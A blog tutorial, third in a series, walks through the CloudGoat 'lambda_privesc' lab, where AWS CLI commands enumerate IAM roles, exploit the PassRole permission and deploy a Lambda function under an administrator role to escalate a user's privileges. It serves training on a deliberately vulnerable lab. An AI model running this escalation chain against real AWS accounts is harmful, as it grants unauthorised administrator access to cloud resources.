Part3: Intro to Aws Penetration testing

In the third segment of the blog focusing on AWS penetration testing, we will delve into the process of executing privilege escalation through a lambda function.

In this particular scenario, we possess a set of keys, and our objective is to elevate our privileges. To initiate the environment, we commence by executing the following command:

python3 cloudgoat.py create lambda_privesc

Utilizing the aws cli, we proceed to generate a new profile.

aws configure –profile chris

Just like in any penetration testing, the enumeration phase holds significant importance. Even within the cloud environment, it remains equally crucial.

aws –profile chris sts get-caller-identity ( take a not the arn )

Check the user policies attached

aws –profile chris iam list-attached-user-policies –user-name chris-lambda_privesc_

Check the list of the rules

aws iam list-roles –profile

The debug role it seems very interesting now we can check what policy are attached on this role

aws iam list-attached-role-policies –role-name cg-debug-role-lambda_privesc_cgidfa6nwh1rc6 –profile chris

Very interesting the “AdministratorAcces”

Now we check what we can do with the other policy
aws iam list-attached-role-policies –role-name cg-lambdaManager-role-lambda_privesc_cgidfa6nwh1rc6 –profile chris

aws iam get-policy-version –policy-arn arn:aws:iam::586054888121:policy/cg-lambdaManager-policy-lambda_privesc_cgidfa6nwh1rc6 –profile chris –version-id v1

The interesting thing here is the PassRole. In AWS, PassRole is an essential permission that allows users or roles to delegate their own IAM (Identity and Access Management) permissions to another service or resource, particularly when it comes to roles associated with AWS services like Lambda, EC2, and others. It is used to grant these services the ability to assume an IAM role to perform certain actions on behalf of the role holder. While PassRole is a powerful capability, it can be dangerous if not adequately managed or misused. Here are some reasons why it can pose a risk, Priv escalation, Lateral Movement, Data Exposure etc.

Now we need to assume the lamda manager role

aws sts assume-role –role-arn arn:aws:iam::586054888121:role/cg-lambdaManager-role-lambda_privesc_cgidfa6nwh1rc6 –role-session-name lambdaManager –profile chris

Now we need to create a new profile using aws cli

aws configure –profile lambdaManager

We need also add the session token into the credentials file

mousepad ~/.aws/credentials


Now, the next step involves creating a lambda function designed to escalate our privilege. The lab provides a code snippet for us to use. You can proceed with the instructions from this point onward.

cat lambda_privesc_cgidfa6nwh1rc6/cheat_sheet_chris.md

So now we need to create a lambda_function.py file

Then we need to zip the file

zip lambda_function.py.zip lambda_function.py

Next, we’ll utilize the AWS CLI to create a Lambda function and configure it in a manner that allows us to invoke it.

$ aws lambda create-function –function-name admin_function –runtime python3.7 –role arn:aws:iam::586054888121:role/cg-debug-role-lambda_privesc_cgidfa6nwh1rc6 –handler lambda_function.lambda_handler –zip-file fileb://lambda_function.py.zip –profile lambdaManager –region us-east-1

Now we need to invoke the function

aws –profile lambdaManager lambda invoke –function-name admin_function output.txt

If everything goes smoothly, we will modify Chris’s privileges, granting us the capability to perform a wide range of actions.

aws –profile chris s3 ls

Finally use the following command to destroy the lab

python3 cloudgoat.py destroy all